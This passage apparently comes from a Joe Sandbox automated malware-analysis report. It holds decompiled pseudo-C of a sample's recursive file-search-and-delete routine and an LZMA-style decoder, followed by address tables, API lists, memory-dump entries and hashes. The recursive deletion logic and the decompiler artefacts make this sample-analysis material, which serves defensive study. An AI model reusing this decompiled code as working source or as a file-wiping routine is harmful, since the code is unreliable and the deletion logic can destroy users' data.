				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004063E8(0x456730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405D09(_t68);
					} else {
						lstrcatW(0x456730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x456730,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E004063E8(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405AB2(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405450(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x4702e8 =  *0x4702e8 + 1;
										} else {
											E00405450(0xfffffff1, _t68);
											E004061AE(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405AFA(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x456730 - 0x5c;
					if( *0x456730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040672B(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405CBD(_t68);
							_t38 = E00405AB2(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405450(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405450(0xfffffff1, _t68);
							return E004061AE(_t67, _t68, 0);
						}
						L30:
						 *0x4702e8 =  *0x4702e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                                                                                                  0x00405b04
                                                                                                                                                                                                  0x00405b09
                                                                                                                                                                                                  0x00405b12
                                                                                                                                                                                                  0x00405b15
                                                                                                                                                                                                  0x00405b1d
                                                                                                                                                                                                  0x00405b20
                                                                                                                                                                                                  0x00405b23
                                                                                                                                                                                                  0x00405b2b
                                                                                                                                                                                                  0x00405b2d
                                                                                                                                                                                                  0x00405b2e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405b2e
                                                                                                                                                                                                  0x00405b39
                                                                                                                                                                                                  0x00405b3c
                                                                                                                                                                                                  0x00405b3c
                                                                                                                                                                                                  0x00405b3c
                                                                                                                                                                                                  0x00405b40
                                                                                                                                                                                                  0x00405b53
                                                                                                                                                                                                  0x00405b5a
                                                                                                                                                                                                  0x00405b5f
                                                                                                                                                                                                  0x00405b63
                                                                                                                                                                                                  0x00405b73
                                                                                                                                                                                                  0x00405b65
                                                                                                                                                                                                  0x00405b6b
                                                                                                                                                                                                  0x00405b6b
                                                                                                                                                                                                  0x00405b78
                                                                                                                                                                                                  0x00405b7c
                                                                                                                                                                                                  0x00405b88
                                                                                                                                                                                                  0x00405b8e
                                                                                                                                                                                                  0x00405b93
                                                                                                                                                                                                  0x00405b99
                                                                                                                                                                                                  0x00405ba4
                                                                                                                                                                                                  0x00405baa
                                                                                                                                                                                                  0x00405bac
                                                                                                                                                                                                  0x00405baf
                                                                                                                                                                                                  0x00405c59
                                                                                                                                                                                                  0x00405c59
                                                                                                                                                                                                  0x00405c5d
                                                                                                                                                                                                  0x00405c5f
                                                                                                                                                                                                  0x00405c5f
                                                                                                                                                                                                  0x00405c5f
                                                                                                                                                                                                  0x00405c5f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405bb5
                                                                                                                                                                                                  0x00405bb5
                                                                                                                                                                                                  0x00405bb5
                                                                                                                                                                                                  0x00405bbd
                                                                                                                                                                                                  0x00405bdd
                                                                                                                                                                                                  0x00405be5
                                                                                                                                                                                                  0x00405bea
                                                                                                                                                                                                  0x00405bf1
                                                                                                                                                                                                  0x00405c0c
                                                                                                                                                                                                  0x00405c11
                                                                                                                                                                                                  0x00405c13
                                                                                                                                                                                                  0x00405c37
                                                                                                                                                                                                  0x00405c15
                                                                                                                                                                                                  0x00405c15
                                                                                                                                                                                                  0x00405c18
                                                                                                                                                                                                  0x00405c2c
                                                                                                                                                                                                  0x00405c1a
                                                                                                                                                                                                  0x00405c1d
                                                                                                                                                                                                  0x00405c25
                                                                                                                                                                                                  0x00405c25
                                                                                                                                                                                                  0x00405c18
                                                                                                                                                                                                  0x00405bf3
                                                                                                                                                                                                  0x00405bf9
                                                                                                                                                                                                  0x00405bfb
                                                                                                                                                                                                  0x00405c01
                                                                                                                                                                                                  0x00405c01
                                                                                                                                                                                                  0x00405bfb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405bf1
                                                                                                                                                                                                  0x00405bbf
                                                                                                                                                                                                  0x00405bc7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405bc9
                                                                                                                                                                                                  0x00405bd1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405bd3
                                                                                                                                                                                                  0x00405bdb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405c3c
                                                                                                                                                                                                  0x00405c44
                                                                                                                                                                                                  0x00405c4a
                                                                                                                                                                                                  0x00405c4a
                                                                                                                                                                                                  0x00405c53
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405c53
                                                                                                                                                                                                  0x00405b7e
                                                                                                                                                                                                  0x00405b86
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405b42
                                                                                                                                                                                                  0x00405b42
                                                                                                                                                                                                  0x00405b44
                                                                                                                                                                                                  0x00405c64
                                                                                                                                                                                                  0x00405c66
                                                                                                                                                                                                  0x00405c69
                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                  0x00405c6b
                                                                                                                                                                                                  0x00405c6e
                                                                                                                                                                                                  0x00405c79
                                                                                                                                                                                                  0x00405c7e
                                                                                                                                                                                                  0x00405c80
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405c83
                                                                                                                                                                                                  0x00405c8f
                                                                                                                                                                                                  0x00405c94
                                                                                                                                                                                                  0x00405c96
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405cb1
                                                                                                                                                                                                  0x00405c98
                                                                                                                                                                                                  0x00405c9b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405ca0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405ca7
                                                                                                                                                                                                  0x00405c70
                                                                                                                                                                                                  0x00405c70
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405c70
                                                                                                                                                                                                  0x00405b4a
                                                                                                                                                                                                  0x00405b4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00405b4d

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,004D5000,746AF560,00000000), ref: 00405B23
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00456730,\*.*), ref: 00405B6B
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00456730,?,?,004D5000,746AF560,00000000), ref: 00405B94
                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(00456730,?,?,?,0040A014,?,00456730,?,?,004D5000,746AF560,00000000), ref: 00405BA4
                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                  • String ID: 0gE$\*.*
                                                                                                                                                                                                  • API String ID: 2035342205-2711052210
                                                                                                                                                                                                  • Opcode ID: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                  • Instruction ID: db7c1e1462c3060b38713ca1582bdc14a6091e72a68d91c70f93002fb38cedfa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3334b6062cde555aafe81a7f2d70c90e4ee62922905af9c316e4bc959eba850f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7941F230805B18A6EB20AB618C89BAF7778DF41718F10813BF805711D2D77C59C28EAE
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 564 406af2-406af7 565 406b68-406b86 564->565 566 406af9-406b28 564->566 569 40715e-407173 565->569 567 406b2a-406b2d 566->567 568 406b2f-406b33 566->568 570 406b3f-406b42 567->570 571 406b35-406b39 568->571 572 406b3b 568->572 573 407175-40718b 569->573 574 40718d-4071a3 569->574 576 406b60-406b63 570->576 577 406b44-406b4d 570->577 571->570 572->570 575 4071a6-4071ad 573->575 574->575 578 4071d4-4071e0 575->578 579 4071af-4071b3 575->579 582 406d35-406d53 576->582 580 406b52-406b5e 577->580 581 406b4f 577->581 591 406976-40697f 578->591 583 407362-40736c 579->583 584 4071b9-4071d1 579->584 588 406bc8-406bf6 580->588 581->580 586 406d55-406d69 582->586 587 406d6b-406d7d 582->587 593 407378-40738b 583->593 584->578 592 406d80-406d8a 586->592 587->592 589 406c12-406c2c 588->589 590 406bf8-406c10 588->590 594 406c2f-406c39 589->594 590->594 595 406985 591->595 596 40738d 591->596 597 406d8c 592->597 598 406d2d-406d33 592->598 599 407390-407394 593->599 601 406bb0-406bb6 594->601 602 406c3f 594->602 603 406a31-406a35 595->603 604 406aa1-406aa5 595->604 605 40698c-406990 595->605 606 406acc-406aed 595->606 596->599 607 406d08-406d0c 597->607 608 406e9d-406eaa 597->608 598->582 600 406cd1-406cdb 598->600 609 407320-40732a 600->609 610 406ce1-406d03 600->610 611 406c69-406c6f 601->611 612 406bbc-406bc2 601->612 626 406b95-406bad 602->626 627 4072fc-407306 602->627 613 4072e1-4072eb 603->613 614 406a3b-406a54 603->614 619 4072f0-4072fa 604->619 620 406aab-406abf 604->620 605->593 618 406996-4069a3 605->618 606->569 615 406d12-406d2a 607->615 616 407314-40731e 607->616 608->591 609->593 610->608 621 406ccd 611->621 623 406c71-406c8f 611->623 612->588 612->621 613->593 622 406a57-406a5b 614->622 615->598 616->593 618->596 624 4069a9-4069ef 618->624 619->593 625 406ac2-406aca 620->625 621->600 622->603 628 406a5d-406a63 622->628 629 406c91-406ca5 623->629 630 406ca7-406cb9 623->630 631 4069f1-4069f5 624->631 632 406a17-406a19 624->632 625->604 625->606 626->601 627->593 633 406a65-406a6c 628->633 634 406a8d-406a9f 628->634 635 406cbc-406cc6 629->635 630->635 636 406a00-406a0e GlobalAlloc 631->636 637 4069f7-4069fa GlobalFree 631->637 638 406a27-406a2f 632->638 639 406a1b-406a25 632->639 640 406a77-406a87 GlobalAlloc 633->640 641 406a6e-406a71 GlobalFree 633->641 634->625 635->611 642 406cc8 635->642 636->596 643 406a14 636->643 637->636 638->622 639->638 639->639 640->596 640->634 641->640 645 407308-407312 642->645 646 406c4e-406c66 642->646 643->632 645->593 646->611
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406AF2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
